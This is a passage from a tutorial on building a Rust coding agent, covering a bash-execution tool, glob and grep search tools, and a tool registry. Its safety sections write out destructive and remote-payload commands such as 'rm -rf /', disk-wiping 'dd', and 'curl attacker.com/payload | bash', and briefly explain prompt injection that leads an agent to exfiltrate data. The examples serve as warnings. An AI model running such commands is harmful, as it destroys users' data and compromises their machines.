B --> C[tokio::process::Command::new bash -c command]
C --> D[.output captures stdout + stderr]
D --> E{stdout empty?}
E -->|No| F[Add stdout to result]
E -->|Yes| G[Skip]
F --> H{stderr empty?}
G --> H
H -->|No| I["Add 'stderr: ' + stderr"]
H -->|Yes| J[Skip]
I --> K{result empty?}
J --> K
K -->|Yes| L["Return '(no output)'"]
K -->|No| M[Return combined result]
The BashTool
Open src/tools/bash.rs. Here is the starter stub:
#![allow(unused)] fn main() { use anyhow::Context; use serde_json::Value; use crate::types::*; pub struct BashTool { definition: ToolDefinition, } impl Default for BashTool { fn default() -> Self { Self::new() } } impl BashTool { /// Schema: one required "command" parameter (string). pub fn new() -> Self { unimplemented!( "Use ToolDefinition::new(name, description).param(...) to define a required \"command\" parameter" ) } } #[async_trait::async_trait] impl Tool for BashTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, _args: Value) -> anyhow::Result<String> { unimplemented!( "Extract command, run bash -c, combine stdout + stderr, return \"(no output)\" if both empty" ) } } }
You need to fill in new() and call(). Here is the complete implementation:
#![allow(unused)] fn main() { impl BashTool { pub fn new() -> Self { Self { definition: ToolDefinition::new("bash", "Run a bash command and return its output") .param("command", "string", "The bash command to run", true), } } } #[async_trait::async_trait] impl Tool for BashTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, args: Value) -> anyhow::Result<String> { let command = args["command"] .as_str() .context("missing 'command' argument")?; let output = tokio::process::Command::new("bash") .arg("-c") .arg(command) .output() .await?; let stdout = String::from_utf8_lossy(&output.stdout); let stderr = String::from_utf8_lossy(&output.stderr); let mut result = String::new(); if !stdout.is_empty() { result.push_str(&stdout); } if !stderr.is_empty() { if !result.is_empty() { result.push('\n'); } result.push_str("stderr: "); result.push_str(&stderr); } if result.is_empty() { result.push_str("(no output)"); } Ok(result) } } }
Let's walk through each piece.
The definition
#![allow(unused)] fn main() { ToolDefinition::new("bash", "Run a bash command and return its output") .param("command", "string", "The bash command to run", true) }
One required parameter: command -- the shell command to execute. The
description "Run a bash command and return its output" is deliberately simple.
The LLM already knows what bash is. Over-describing the tool wastes prompt
tokens and can confuse the model into overthinking when to use it.
As an extension, you could add a timeout parameter to let the LLM override
the default timeout for long-running commands. The reference implementation
includes this.
Argument extraction
#![allow(unused)] fn main() { let command = args["command"] .as_str() .context("missing 'command' argument")?; }
The command extraction uses .context(...) with ? to return an Err if the argument is missing. A bash call without a command is a protocol violation, not a tool failure. The LLM should never produce this, and if it does, the agent's error handling will catch it.
Running the command
#![allow(unused)] fn main() { let output = tokio::process::Command::new("bash") .arg("-c") .arg(command) .output() .await?; }
Rust concept: tokio::process::Command vs std::process::Command
tokio::process::Command is the async counterpart of std::process::Command. The key difference: std's version blocks the current OS thread while waiting for the subprocess to finish. In an async runtime like Tokio, blocking a thread means the runtime cannot make progress on other tasks (other tool calls, streaming events, UI updates). tokio's version yields to the runtime while waiting, so the thread can do useful work. Always use tokio::process inside async fn -- using std::process in an async context is a common mistake that leads to performance problems or deadlocks under load.
Two layers here, each doing one thing:
-
tokio::process::Commandspawns an async subprocess. We usebash -cso the command string is interpreted by bash, not executed as a raw binary. This means pipes, redirects, semicolons, and all other shell features work:echo hello | wc -c,ls > out.txt,cd /tmp && pwd. -
.output()collects the process's stdout, stderr, and exit status. This buffers everything in memory. For a production agent you would want streaming (pipe stdout/stderr to the TUI in real time), but buffered collection is simpler and sufficient for our purposes.
If the process fails to spawn (bash not found, OS refuses to create the process),
the ? operator propagates the error up. The agent loop catches it and reports
it to the LLM.
Adding a timeout (extension)
Without a timeout, a single bad command can hang the agent forever. The LLM might run sleep infinity, start a server that listens on a port, or trigger an interactive program that waits for stdin. Any of these blocks the agent loop indefinitely -- no more tool calls, no more responses, just a frozen process burning compute.
As an extension, you can wrap the command in tokio::time::timeout:
#![allow(unused)] fn main() { let output = tokio::time::timeout( std::time::Duration::from_secs(120), tokio::process::Command::new("bash") .arg("-c") .arg(command) .output(), ) .await; }
This produces a nested Result: Ok(Ok(output)) for success, Ok(Err(e))
for spawn failures, and Err(_) for timeouts. The reference implementation
includes this pattern.
Output format
The output construction logic handles three concerns: stdout, stderr, and the empty case.
#![allow(unused)] fn main() { let stdout = String::from_utf8_lossy(&output.stdout); let stderr = String::from_utf8_lossy(&output.stderr); let mut result = String::new(); if !stdout.is_empty() { result.push_str(&stdout); } if !stderr.is_empty() { if !result.is_empty() { result.push('\n'); } result.push_str("stderr: "); result.push_str(&stderr); } if result.is_empty() { result.push_str("(no output)"); } }
Walk through each decision:
Rust concept: String::from_utf8_lossy vs String::from_utf8
String::from_utf8_lossy returns a Cow<str> -- it borrows the original bytes if they are valid UTF-8 (zero-cost), or allocates a new String with replacement characters if they are not. The alternative, String::from_utf8(), returns Err on invalid UTF-8, which would require error handling for a case we want to tolerate. from_utf8_lossy is the right choice whenever you need a string but cannot guarantee the input encoding.
String::from_utf8_lossy converts the raw bytes to a string, replacing invalid UTF-8 sequences with the replacement character. Command output is not guaranteed to be valid UTF-8 -- binary data, locale-dependent encodings, or corrupted streams can all produce invalid bytes. Lossy conversion is the right default because the LLM needs a string, and a few replacement characters are better than a crash.
Stdout comes first, undecorated. This is the primary output. When ls lists files or cat prints content, that output appears verbatim. No prefix, no wrapping.
Stderr is prefixed with "stderr: ". This lets the LLM distinguish normal output from error output. Many commands write diagnostics to stderr even on success (compiler warnings, progress indicators, deprecation notices). The prefix prevents the model from misinterpreting warnings as failures. The newline before the prefix is only added if stdout was non-empty, keeping the output clean when stderr is the only content.
"(no output)" for silent commands. Commands like true, mkdir -p /tmp/foo, or cp a b produce no stdout and no stderr on success. Returning an empty string would confuse the LLM -- it might think the tool failed or the result was lost. The sentinel string confirms the command ran and had nothing to say.
As an extension, you could also report non-zero exit codes in the output string.
The reference implementation appends "exit code: N" when the process exits
with a non-zero status, helping the LLM diagnose failures.
Safety considerations
The bash tool is the most dangerous tool in the agent's arsenal. It can run
anything -- rm -rf /, dd if=/dev/zero of=/dev/sda, curl ... | bash.
The starter's simplified Tool trait does not include safety flags like
is_destructive(), but in a production agent (and in the reference
implementation), the bash tool would be marked as destructive, requiring explicit
user approval even in auto-approve mode.
The starter Tool trait has only definition() and call(). Adding safety
metadata (read-only, destructive, concurrent-safe flags) is an extension topic
covered in later chapters.
Safety warning
This tool passes LLM-generated commands directly to a bash shell. There is no sandboxing, no command filtering, no allowlist, no denylist. The LLM can run rm -rf / and your filesystem is gone. It can run curl attacker.com/payload | bash and your machine is compromised. It can read your SSH keys, your environment variables, your browser cookies.
This is not a hypothetical concern. LLMs can be manipulated through prompt injection -- malicious instructions hidden in file contents, README files, or web pages that the agent processes. A carefully crafted prompt injection could instruct the model to exfiltrate data or destroy files.
For the purposes of this tutorial, the bash tool is safe to use with trusted prompts in a controlled environment. Do not point it at untrusted input. Do not run it on a machine with sensitive data. Use a container, a VM, or at minimum a dedicated user account with limited permissions.
Chapters 13-16 build the safety infrastructure that makes the bash tool safe for production:
- Chapter 13 (Permissions) adds the permission engine that gates every tool call, requiring user approval for destructive operations.
- Chapter 14 (Safety) adds command classification that detects and blocks dangerous patterns like
rm -rf,chmod 777, andcurl | bash. - Chapter 15 (Hooks) adds pre-tool hooks that can inspect and reject commands before execution.
- Chapter 16 (Plan Mode) adds a read-only mode where destructive tools are blocked entirely.
Until you build those chapters, treat the bash tool with the respect you would give sudo access to an unpredictable collaborator.
How Claude Code does it
Claude Code's bash tool shares the same core -- bash -c <command> with timeout -- but adds several layers of production hardening:
Command filtering. Before executing any command, Claude Code runs the command string through a safety classifier that checks for dangerous patterns. Commands like rm -rf /, chmod -R 777, curl ... | sh, and others are flagged or blocked outright. The classifier is not a simple regex -- it understands shell quoting and piping to avoid false positives.
Working directory management. Claude Code tracks and sets the working directory for each bash invocation. If the user cds into a directory in one command, subsequent commands remember that directory. Our version always runs in the process's current directory.
Process group killing on timeout. When our tool times out, the spawned process may continue running in the background. Claude Code creates a process group for each command and kills the entire group on timeout, ensuring no orphan processes linger.
Streaming stdout/stderr. Rather than buffering all output and returning it at the end, Claude Code pipes stdout and stderr to the TUI in real time. The user sees compilation output, test results, and progress indicators as they happen. This is essential for long-running commands where waiting for the final result would leave the user staring at a blank screen.
Permission engine integration. Every bash command passes through the permission engine before execution. Depending on the configuration, the user may be prompted to approve the command, the command may be auto-approved if it matches a safe pattern, or it may be denied outright.
Our version is the core protocol without the safety wrapping -- the minimal viable implementation that demonstrates how an LLM interacts with a shell. The production features are layers on top, not changes to the fundamental design.
Tests
Run the bash tool tests:
cargo test -p mini-claw-code-starter test_bash_
Here is what the bash-specific tests verify:
test_bash_definition -- Checks that the tool name is "bash".
test_bash_runs_command -- Runs a simple command and checks that stdout is captured.
test_bash_captures_stderr -- Runs a command that writes to stderr and checks that the output contains the stderr content.
test_bash_stdout_and_stderr -- Runs a command that produces both stdout and stderr, and verifies both appear in the output.
test_bash_no_output -- Runs true (a command that succeeds silently) and checks that the output indicates no output was produced.
test_bash_multiline_output -- Runs a multi-command pipeline and checks that all output lines appear.
Recap
You have built the bash tool -- the most important and most dangerous tool in the agent's toolkit:
commandis the one required parameter.tokio::process::Commandwithbash -cgives the LLM full shell access -- pipes, redirects, variables, and everything else bash supports.- Output format combines stdout and labeled stderr into a single string. Silent commands return
"(no output)"so the LLM knows the command ran. - No safety rails -- this chapter builds the raw capability. The permission engine, safety classifier, hooks, and plan mode come in later chapters.
As extensions, you could add a timeout parameter (to prevent hung commands),
exit code reporting, and safety flags like is_destructive().
The bash tool completes the core tool set. Your agent can now read files, write files, edit files, and run arbitrary commands. With the SimpleAgent from the earlier chapters driving the loop, you have a functioning coding agent -- one that can understand a codebase, make changes, run tests, and iterate until the job is done.
Key takeaway
The bash tool is what makes a coding agent a programmer rather than a text editor. It is also the simplest tool to implement (a single Command::new("bash").arg("-c").arg(command) call) and the hardest to make safe. The implementation pattern -- capture output, label stderr, handle silence -- is reusable for any subprocess-based tool.
What's next
In Chapter 11: Search Tools you will build the tools that help the agent navigate large codebases -- glob for finding files by pattern and grep for searching file contents. These read-only tools are the agent's eyes, complementing the hands (bash, write, edit) you have already built.
Check yourself
← Chapter 9: File Tools · Contents · Chapter 11: Search Tools →
Chapter 11: Search Tools
File(s) to edit: (extension -- no stubs in starter) Tests: No tests in the starter. GlobTool and GrepTool are extension tools. Estimated time: 25 min (read-only)
Goal
- Understand why file discovery (GlobTool) and content search (GrepTool) are separate tools with distinct parameter schemas.
- Implement
GlobToolso the agent can find files by name pattern using theglobcrate. - Implement
GrepToolwith recursive directory walking, regex matching, and an optional file type filter. - Learn when to use async vs sync helper functions in tool implementations (I/O-bound file reads vs fast directory walking).
A coding agent that can only read files it already knows about is like a developer who never uses find or grep. You can hand it a specific file path and it will read it faithfully, but drop it into an unfamiliar codebase and it is blind. It cannot discover which files exist, cannot search for where a function is defined, cannot find all the places a type is used. Without search, the LLM has to guess file paths -- and it will guess wrong.
Search tools fix this. In this chapter we explore two: GlobTool finds files by name pattern, and GrepTool searches file contents by regex. Together they give the LLM the ability to navigate any codebase, no matter how large or unfamiliar. These are the eyes of the agent.
How the search tools fit into the agent workflow
flowchart TD
LLM[LLM decides what to do]
LLM -->|"What files exist?"| Glob[GlobTool]
LLM -->|"Where is this defined?"| Grep[GrepTool]
Glob -->|returns file paths| LLM
Grep -->|"returns path:line: content"| LLM
LLM -->|reads specific file| Read[ReadTool]
LLM -->|modifies file| Edit[EditTool]
Read -->|file contents| LLM
Edit -->|confirmation| LLM
Note: Search tools are extensions in this book -- neither the starter (
mini-claw-code-starter) nor the reference implementation (mini-claw-code) ships aGlobToolorGrepTool. If you want to add them, you will createsrc/tools/glob.rsandsrc/tools/grep.rsfrom scratch and register them insrc/tools/mod.rs. The complete reference code for both tools is reproduced inline below -- treat this chapter as an annotated implementation walkthrough rather than a stub-filling exercise.
Two tools, two questions
The split between glob and grep maps to two distinct questions the LLM asks when exploring code:
-
"What files exist?" -- GlobTool. The LLM knows it wants Rust files, or test files, or config files. It does not know their exact paths. A glob pattern like
**/*.rsortests/*.tomlanswers this. -
"Where is this thing defined?" -- GrepTool. The LLM knows a function name, a type, an error message. It needs to find which file and which line contain it. A regex pattern like
fn parse_sse_lineorstruct QueryConfiganswers this.
Claude Code has both as separate tools for exactly this reason. They serve different purposes, take different inputs, and the LLM chooses between them based on what it knows. Merging them into one tool would muddy the interface -- the LLM would have to figure out whether it is doing a name search or a content search, and the parameter schema would be awkward.
GlobTool
GlobTool is the simpler of the two. It takes a glob pattern, optionally scoped to a base directory, and returns all matching file paths.
File layout
The implementation lives at src/tools/glob.rs. Here is the complete code:
#![allow(unused)] fn main() { use async_trait::async_trait; use serde_json::Value; use crate::types::*; pub struct GlobTool { definition: ToolDefinition, } impl GlobTool { pub fn new() -> Self { Self { definition: ToolDefinition::new("glob", "Find files matching a glob pattern") .param("pattern", "string", "Glob pattern (e.g. \"**/*.rs\")", true) .param( "path", "string", "Base directory to search in (default: current directory)", false, ), } } } impl Default for GlobTool { fn default() -> Self { Self::new() } } #[async_trait] impl Tool for GlobTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, args: Value) -> anyhow::Result<String> { let pattern = args["pattern"] .as_str() .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?; let base = args .get("path") .and_then(|v| v.as_str()) .unwrap_or("."); let full_pattern = if pattern.starts_with('/') || pattern.starts_with('.') { pattern.to_string() } else { format!("{base}/{pattern}") }; let entries: Vec<String> = glob::glob(&full_pattern) .map_err(|e| anyhow::anyhow!("invalid glob pattern: {e}"))? .filter_map(|entry| entry.ok()) .map(|p| p.display().to_string()) .collect(); if entries.is_empty() { Ok("no files matched".to_string()) } else { Ok(entries.join("\n")) } } } }
Walking through the implementation
The definition. Two parameters: pattern (required) and path (optional). The pattern is a standard glob -- *.rs for Rust files in the current directory, **/*.rs for Rust files recursively, src/**/*.toml for TOML files under src/. The path sets the base directory; it defaults to "." (the current working directory) when omitted.
Pattern construction. The call method builds the full glob pattern from the base directory and the user-supplied pattern. If the pattern already starts with / or ., it is treated as an absolute or relative path and used directly. Otherwise, the base directory is prepended: format!("{base}/{pattern}"). This means calling with {"pattern": "*.rs", "path": "/home/user/project"} produces the glob /home/user/project/*.rs.
The glob crate. We use the glob crate (already in Cargo.toml) to do the actual matching. glob::glob() returns an iterator of Result<PathBuf> entries. We filter_map with entry.ok() to silently skip any paths that fail (permission errors, broken symlinks). The remaining paths are converted to display strings and collected.
Output format. Matching paths are joined with newlines -- one path per line. If nothing matches, we return "no files matched" rather than an empty string. This matters for the LLM: an explicit "no files matched" message tells it the pattern was valid but found nothing, prompting it to try a different pattern. An empty string would be ambiguous.
GrepTool
GrepTool is more complex. It searches file contents using regex, optionally scoped to a directory and filtered by file type. The output follows the classic grep format: path:line_no: content.
The complete implementation
Here is src/tools/grep.rs:
#![allow(unused)] fn main() { use std::path::Path; use async_trait::async_trait; use serde_json::Value; use crate::types::*; pub struct GrepTool { definition: ToolDefinition, } impl GrepTool { pub fn new() -> Self { Self { definition: ToolDefinition::new("grep", "Search file contents using a regex pattern") .param("pattern", "string", "Regex pattern to search for", true) .param( "path", "string", "File or directory to search in (default: current directory)", false, ) .param( "include", "string", "Glob pattern to filter files (e.g. \"*.rs\")", false, ), } } } impl Default for GrepTool { fn default() -> Self { Self::new() } } #[async_trait] impl Tool for GrepTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, args: Value) -> anyhow::Result<String> { let pattern = args["pattern"] .as_str() .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?; let re = regex::Regex::new(pattern) .map_err(|e| anyhow::anyhow!("invalid regex pattern: {e}"))?; let search_path = args .get("path") .and_then(|v| v.as_str()) .unwrap_or("."); let include_pattern = args.get("include").and_then(|v| v.as_str()); let include_glob = include_pattern .map(|p| glob::Pattern::new(p)) .transpose() .map_err(|e| anyhow::anyhow!("invalid include pattern: {e}"))?; let path = Path::new(search_path); let mut matches = Vec::new(); if path.is_file() { search_file(&re, path, &mut matches).await; } else if path.is_dir() { let mut entries = Vec::new(); collect_files(path, &include_glob, &mut entries); entries.sort(); for file_path in entries { search_file(&re, &file_path, &mut matches).await; } } else { anyhow::bail!("path does not exist: {search_path}"); } if matches.is_empty() { Ok("no matches found".to_string()) } else { Ok(matches.join("\n")) } } } /// Search a single file for regex matches and append formatted results. async fn search_file(re: ®ex::Regex, path: &Path, matches: &mut Vec<String>) { let Ok(content) = tokio::fs::read_to_string(path).await else { return; // Skip binary/unreadable files }; let display = path.display(); for (line_no, line) in content.lines().enumerate() { if re.is_match(line) { matches.push(format!("{display}:{}: {line}", line_no + 1)); } } } /// Recursively collect files from a directory, optionally filtering by glob. fn collect_files( dir: &Path, include: &Option<glob::Pattern>, out: &mut Vec<std::path::PathBuf>, ) { let Ok(entries) = std::fs::read_dir(dir) else { return; }; for entry in entries.flatten() { let path = entry.path(); if path.is_dir() { // Skip hidden directories if path .file_name() .is_some_and(|n| n.to_string_lossy().starts_with('.')) { continue; } collect_files(&path, include, out); } else if path.is_file() { if let Some(glob) = include { let name = path .file_name() .map(|n| n.to_string_lossy().to_string()) .unwrap_or_default(); if !glob.matches(&name) { continue; } } out.push(path); } } } }
Walking through the implementation
There is more going on here, so let's take it piece by piece.
The definition. Three parameters: pattern (required regex), path (optional file or directory), and include (optional glob filter for file names). The LLM might call it as {"pattern": "fn main"} to search the current directory, or {"pattern": "TODO", "path": "src/", "include": "*.rs"} to search only Rust files under src/.
Regex compilation. The pattern is compiled into a regex::Regex upfront. If the LLM provides an invalid regex (missing closing bracket, bad escape), we return an error immediately rather than crashing partway through the search. The regex crate handles the full Rust regex syntax -- character classes, quantifiers, alternation, captures.
The include filter. The include parameter is a glob pattern, not a regex. We compile it into a glob::Pattern using the same glob crate that powers GlobTool.
Rust concept: Option::transpose
The .transpose() call converts Option<Result<T>> into Result<Option<T>>. This is a common Rust idiom when you have an optional operation that might fail. Without transpose, you would need a match or if let to handle the Some(Ok(...)), Some(Err(...)), and None cases separately. With it, you can use ? to propagate the error and end up with a clean Option<T>. The pattern x.map(fallible_fn).transpose()? reads as: "if present, try the operation; if it fails, propagate the error; if absent, produce None."
Three-way path dispatch. The search path can be a file, a directory, or nonexistent:
- File: Search just that one file. The LLM does this when it already knows which file to look in.
- Directory: Recursively collect all files (filtered by
includeif provided), sort them for deterministic output, then search each one. - Nonexistent: Return an error via
bail!. The agent loop catches this and reports it to the LLM as"error: path does not exist: /nonexistent/path", and the model can recover by trying a different path.
Output format. Each match is formatted as path:line_no: content, following the classic grep convention. Line numbers are 1-based (humans and LLMs both expect line 1 to be the first line, not line 0). When no matches are found, the tool returns "no matches found" -- again, explicit is better than empty.
Helper function design
Rust concept: choosing async vs sync for helpers
The two helper functions -- search_file and collect_files -- are deliberately designed with different signatures. Understanding why reveals practical Rust async patterns. The decision rule is simple: if the function does I/O that could block (reading file contents), make it async. If it does fast metadata operations (listing directory entries), keep it sync. Making everything async "just in case" adds complexity -- recursive async functions require Pin<Box<dyn Future>> or the async_recursion crate -- and provides no benefit when the operation is already fast.
search_file is async
#![allow(unused)] fn main() { async fn search_file(re: ®ex::Regex, path: &Path, matches: &mut Vec<String>) { let Ok(content) = tokio::fs::read_to_string(path).await else { return; // Skip binary/unreadable files }; let display = path.display(); for (line_no, line) in content.lines().enumerate() { if re.is_match(line) { matches.push(format!("{display}:{}: {line}", line_no + 1)); } } } }
This function reads a file from disk, which is I/O. Using tokio::fs::read_to_string instead of std::fs::read_to_string keeps the async runtime free to do other work while waiting on the filesystem. In a real agent with concurrent tool execution, this matters -- a slow NFS mount or large file should not block the entire runtime.
The let Ok(content) = ... else { return; } pattern is a quiet bailout. If the file cannot be read -- it is binary, it is a symlink to a deleted file, the user lacks permissions -- we silently skip it. This is the right behavior for a search tool. The LLM asked "where does this pattern appear?" and the answer should only include files where we could actually check. Reporting an error for every unreadable file in a directory tree would drown the useful results in noise.
collect_files is sync
#![allow(unused)] fn main() { fn collect_files( dir: &Path, include: &Option<glob::Pattern>, out: &mut Vec<std::path::PathBuf>, ) { let Ok(entries) = std::fs::read_dir(dir) else { return; }; for entry in entries.flatten() { let path = entry.path(); if path.is_dir() { if path .file_name() .is_some_and(|n| n.to_string_lossy().starts_with('.')) { continue; } collect_files(&path, include, out); } else if path.is_file() { if let Some(glob) = include { let name = path .file_name() .map(|n| n.to_string_lossy().to_string()) .unwrap_or_default(); if !glob.matches(&name) { continue; } } out.push(path); } } } }
Directory walking is fast -- it reads metadata, not file contents. Making it async would add complexity (recursive async functions require boxing) without meaningful performance benefit. The sync std::fs::read_dir is fine here.
Three details worth noting:
Hidden directory skipping. Directories whose names start with . are skipped entirely. This excludes .git, .cargo, .vscode, node_modules hidden behind a dot-prefix, and similar directories that are almost never what the LLM wants to search. Without this filter, a grep through a project directory would spend most of its time scanning .git/objects -- thousands of binary blob files that produce no useful matches.
The include filter. When present, the glob pattern is matched against the file name only (not the full path). This means "*.rs" matches src/main.rs by checking just main.rs against the pattern. This is intuitive -- when the LLM says "search only Rust files," it means files ending in .rs, regardless of where they live in the tree.
The sort. After collecting all files, the caller sorts them before searching. This ensures deterministic output order. Without sorting, read_dir returns entries in filesystem order, which varies across operating systems and even across runs on the same system. Deterministic output makes tests reliable and makes the LLM's experience consistent.
Why two separate tools
You might wonder: why not one SearchTool with a mode parameter? The answer comes down to how LLMs make decisions.
When the LLM sees two separate tools in its schema -- one called glob described as "find files matching a pattern" and one called grep described as "search file contents using regex" -- it can instantly match its intent to the right tool. "I need to find all test files" maps to glob. "I need to find where parse_sse_line is defined" maps to grep.
A combined tool with a mode: "files" | "content" parameter adds a decision layer. The LLM has to read the schema more carefully, understand the mode field, and get it right. With smaller models, this extra indirection leads to mistakes -- calling the tool in the wrong mode, or omitting the mode parameter entirely.
Claude Code keeps them separate. So do we.
There is also a practical reason: the parameter sets are different. Glob takes a glob pattern and a base path. Grep takes a regex pattern, a path, and an include filter. Merging them would mean the LLM always sees parameters that are irrelevant to what it is doing, which wastes context tokens and increases the chance of confusion.
How Claude Code does it
Our implementations are the essential protocol -- they capture the core behavior in under 200 lines. Claude Code's production versions are considerably more sophisticated.
Claude Code's Glob uses ripgrep internally for speed. On large codebases with hundreds of thousands of files, the glob crate's pure-Rust implementation can be slow. Ripgrep's directory walker is optimized for this use case, respecting .gitignore rules and parallelizing the walk. Claude Code's Glob also supports sorting results by modification time (most recently changed files first, which is often what the LLM wants) and limits the number of results to avoid flooding the context window.
Claude Code's Grep is equally enhanced. It supports context lines (-A, -B, -C flags) to show surrounding code, which helps the LLM understand matches without making a separate read call. It offers multiple output modes: show matching lines (default), show only file paths (for counting), or show match counts per file. File type filtering uses ripgrep's built-in type system rather than a glob pattern, so --type rust knows about .rs files, Cargo.toml, and build.rs without the user spelling out the glob.
Our versions skip all of this. We use the glob crate instead of ripgrep, we have no context lines, no output modes, no result limits. What we do have is the correct protocol: the LLM sends a pattern and gets back matching results in a format it can parse. Everything else is optimization. If you want to upgrade later, the Tool trait interface stays the same -- only the internals of call() change.
Tests
Since GlobTool and GrepTool are extensions, neither the starter nor the
reference implementation ships tests for them. The assertions below describe
the test cases you would add alongside the tool code if you build these out
yourself -- they are the contract the tools should satisfy. Once you have
copied the tool code into mini-claw-code-starter/src/tools/ and written
these tests, you can run them with:
cargo test -p mini-claw-code-starter grep
Recommended test cases:
GlobTool tests
test_grep_glob_find_files -- Creates a temp directory with a.rs, b.rs, and c.txt. Globs for *.rs. Verifies that both .rs files appear in the result and the .txt file does not.
test_grep_glob_recursive -- Creates a temp directory with top.rs at the root and sub/deep.rs in a subdirectory. Globs for **/*.rs. Verifies that both files are found, confirming recursive descent works.
test_grep_glob_no_matches -- Creates a temp directory with file.txt and globs for *.xyz. Verifies the result contains "no files matched".
test_grep_glob_definition -- Verifies the tool definition has the name "glob".
GrepTool tests
test_grep_grep_single_file -- Creates a file containing fn main() and println!("hello"). Greps for "println". Verifies the match includes the content and the correct line number (:2:).
test_grep_grep_directory -- Creates two files, both containing fn foo(). Greps the directory for "fn foo". Verifies both files appear in the results.
test_grep_grep_with_include -- Creates code.rs and data.txt, both containing "hello world". Greps with include: "*.rs". Verifies only the .rs file appears in results.
test_grep_grep_no_matches -- Creates a file and greps for a pattern that does not appear. Verifies the result contains "no matches found".
test_grep_grep_regex -- Creates a file with foo123, bar456, baz789. Greps with the regex \d{3} (three digits). Verifies all three lines match, confirming real regex support rather than plain string matching.
test_grep_grep_nonexistent_path -- Greps a path that does not exist. Verifies the result is an error.
test_grep_grep_definition -- Verifies the tool definition has the name "grep".
Recap
This chapter added two search tools that let the agent discover and navigate code:
-
GlobTool finds files by name pattern. It takes a glob like
**/*.rsand returns matching paths, one per line. It uses theglobcrate for pattern matching and defaults to the current directory when no base path is provided. -
GrepTool searches file contents by regex. It takes a pattern like
fn mainand returns matches inpath:line_no: contentformat. It supports scoping to a file or directory and filtering by file type with theincludeparameter. Two helper functions split the work:search_file(async, handles I/O) andcollect_files(sync, walks the directory tree). -
Both tools are read-only. They never modify the filesystem. In a production agent with safety flags, they would be marked as read-only and concurrent-safe.
-
The separation is deliberate. Glob answers "what files exist?" Grep answers "where is this content?" Two tools with clear purposes are easier for the LLM to use correctly than one tool with a mode switch.
-
These are extensions. The starter does not include stubs for GlobTool or GrepTool. If you want to add them, create the files from scratch following the patterns shown above and register them in
src/tools/mod.rs.
Key takeaway
Search tools are what turn a coding agent from a tool that edits known files into one that can explore and understand an unfamiliar codebase. The two-tool split (glob for names, grep for contents) maps directly to the two questions a developer asks when navigating code: "what files exist?" and "where is this thing?" Keeping them separate gives the LLM a clear, unambiguous interface for each question.
With search tools in place, the agent can now explore an unfamiliar codebase on its own. Given a prompt like "find and fix the bug in the parser," it can glob for source files, grep for the parser code, read the relevant files, and then use the write and edit tools from Chapter 9 to make changes. The tool suite is becoming complete.
Check yourself
← Chapter 10: Bash Tool · Contents · Chapter 12: Tool Registry →
Chapter 12: Tool Registry
File(s) to edit:
src/types.rs(ToolSet) Test to run:cargo test -p mini-claw-code-starter test_multi_tool_(integration tests) Estimated time: 30 min
You have five tools. You have a SimpleAgent. This chapter wires them together.
Goal
- Build a
default_tools()helper that assembles all tools into a singleToolSetso the agent can discover and dispatch them by name. - Wire the
ToolSettoSimpleAgentso the LLM sees all tool schemas and the agent dispatches calls to the correct tool. - Handle unknown tool calls gracefully by returning an error string that lets the LLM recover.
- Run the full integration test suite proving that real tools execute with real side effects inside the agent loop.
Over the past chapters you built the individual tools that let your agent interact with the world -- file reading and writing (Chapter 9), command execution (Chapter 10), and optionally pattern search (Chapter 11). Each tool implements the Tool trait, has a JSON schema, and returns a String. But they exist in isolation. The agent has no way to discover them, expose their schemas to the LLM, or dispatch calls by name.
The tool registry is the bridge. It holds every available tool in a single ToolSet, exposes their schemas to the LLM so it knows what it can call, and dispatches incoming tool calls to the correct implementation by name. By the end of this chapter, you will have a fully functional coding agent that can read, write, edit, and execute commands -- the complete tool loop, now with real tools instead of test doubles.
cargo test -p mini-claw-code-starter test_multi_tool_
The module layout
All tool implementations live under src/tools/, one file per tool:
src/tools/
mod.rs -- re-exports everything
ask.rs -- AskTool (bonus)
bash.rs -- BashTool
edit.rs -- EditTool
read.rs -- ReadTool
write.rs -- WriteTool
The mod.rs is a flat barrel file:
#![allow(unused)] fn main() { mod ask; mod bash; mod edit; mod read; mod write; pub use ask::*; pub use bash::BashTool; pub use edit::EditTool; pub use read::ReadTool; pub use write::WriteTool; }
Every tool is a separate file with a single public struct. The mod.rs re-exports the structs so downstream code can write use crate::tools::{ReadTool, WriteTool} without reaching into individual modules.
The flat structure is deliberate. There is no tools/file/mod.rs grouping ReadTool, WriteTool, and EditTool together. Why? Because tools are always referenced individually -- you register ReadTool::new(), not FileTools::all(). A flat module keeps the import paths short and the mental model simple. When you have 5 tools this is obviously fine. Claude Code has 40+ tools and still uses a similar flat layout -- each tool is its own module with a single export.
Key Rust concept: trait objects and dynamic dispatch
The ToolSet stores tools as Box<dyn Tool> -- a trait object that erases the concrete type. This means ReadTool, WriteTool, EditTool, and BashTool all become the same type behind a pointer, despite having different implementations. The HashMap<String, Box<dyn Tool>> is the collection that makes this work: it maps tool names to trait objects, so the agent can look up any tool by its string name at runtime.
This is dynamic dispatch. When the agent calls tool.call(args), the compiler does not know at compile time which call() method to invoke. It uses a vtable -- a function pointer table attached to the trait object -- to find the correct implementation at runtime. The cost is one pointer indirection per call, which is negligible compared to the I/O and network operations the tools perform.
Building a ToolSet
The ToolSet you defined in Chapter 4 is a HashMap<String, Box<dyn Tool>> with a builder API. Now we use it for real. Here is a helper function that assembles the standard tool set:
#![allow(unused)] fn main() { fn default_tools() -> ToolSet { ToolSet::new() .with(ReadTool::new()) .with(WriteTool::new()) .with(EditTool::new()) .with(BashTool::new()) } }
Four calls to .with(), one per tool. Each call constructs the tool, extracts its name from the ToolDefinition, and inserts it into the internal HashMap. The builder pattern means the order does not matter -- the tools are keyed by name, not position. (The AskTool requires an InputHandler, so it is registered separately when user input is needed.)
After construction, the ToolSet supports the operations the agent needs:
#![allow(unused)] fn main() { let tools = default_tools(); // Look up a tool by name (returns Option<&dyn Tool>) let read = tools.get("read").unwrap(); // Get all schemas for the LLM let defs: Vec<&ToolDefinition> = tools.definitions(); }
The definitions() method is what the SimpleAgent calls at the start of each loop iteration to tell the LLM which tools are available. Every definition includes the tool's name, description, and JSON Schema for its parameters. The LLM uses this information to decide when and how to call each tool.
The get() method is what the agent calls during tool dispatch -- the LLM says "name": "read", the agent does tools.get("read"), and calls the returned tool's .call() method with the provided arguments.
Tool categories (extension concept)
Not all tools are created equal. In the starter, the Tool trait is simplified
to just definition() and call(). But in a production agent, tools carry
